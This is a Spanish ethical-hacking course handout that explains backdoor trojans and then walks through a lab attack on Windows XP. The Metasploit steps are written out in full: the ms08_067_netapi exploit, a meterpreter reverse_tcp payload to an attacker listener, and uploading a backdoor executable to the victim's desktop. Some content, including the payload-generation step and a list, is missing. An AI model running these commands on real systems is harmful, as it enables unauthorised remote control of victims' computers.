Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Metasploit-Backdoor
Metasploit-Backdoor
Backdoor
Puertas Traseras
Hoy en día, las puertas traseras son el tipo de troyanos más peligroso y difundido. Estos troyanos son utilitarios de
administración remota que someten los equipos infectados a un control externo por medio de la red local o Internet. Su
forma de funcionamiento es similar a la de los programas de administración remota (a distancia) usados por los
administradores de sistemas. Esto hace que sea difícil detectarlos.
La única diferencia entre una herramienta de administración legal y una puerta trasera es que éstas se instalan sin que el
usuario lo sepa y sin su consentimiento. Cuando la puerta trasera es ejecutada, empieza a monitorear el sistema local sin
que el usuario lo note. Con frecuencia la puerta trasera no figura en el log de los programas activos.
Una vez que un utilitario de administración a distancia se instala y ejecuta, el equipo de la víctima queda a disposición del
agresor. Las puertas traseras pueden:
En otras palabras, los autores de virus usan las puertas traseras para detectar y bajar información confidencial, ejecutar
código malicioso, destruir datos, incluir el computador en redes bot, etc. En resumen, las puertas traseras combinan la
funcionalidad de la mayoría de tipos de troyanos en un solo paquete.
Las puertas traseras tienen una subclase particularmente peligrosa: las variantes que pueden propagarse como gusanos. La
única diferencia es que los gusanos están programados para propagarse constantemente, en tanto que las puertas traseras
móviles se propagan únicamente al recibir una instrucción específica de su "amo".
Con lo anterior estamos creando un archive llamado noabrir.exe con los datos de mi BackTrack, de tal manera que cuando el objetivo (victima)
ejecute el archivo, nos envíe la información del pc. El resultado lo vemos en la siguiente pantalla.
FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO
Profesor: Luis Alfonso Jiménez Piedrahita
Después de crear el BackDoor, se procede a pasarle al objetivo este archivo y colocarlo en una parte del pc de tal forma que se vea y lo ejecute en
cualquier momento…
Para efectos del ejercicio, realizaremos una intrusión a Windows XP y colocaremos este archivo en el escritorio para ser ejecutado posteriormente.
Proceso:
1. msfconsole
2. use exploit/windows/smb/ms08_067_netapi
3. set rhost 192.168.100.200
4. set rport 445
5. set lhost 192.168.100.100
6. set payload windows/meterpreter/reverse_tcp
7. exploit
8. upload noabrir.exe C:\\”Documents and Settings”\\Administrador\\Escritorio
Ejecutar el Exploit
Luego de pasar el archivo al Objetivo (victima), procedemos a ejecutar el Exploit que nos va a permitir capturar los datos del pc cuando se ejecute el
archivo.
FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO
Profesor: Luis Alfonso Jiménez Piedrahita
Lo único que no falta es que el Objetivo ejecute el archivo y si no hay ningún inconveniente, nos dará una conexión meterpreter al objetivo.
Con esto ya tenemos acceso al objetivo y podemos realizar lo que se necesite realizar en este equipo…
Muchos Éxitos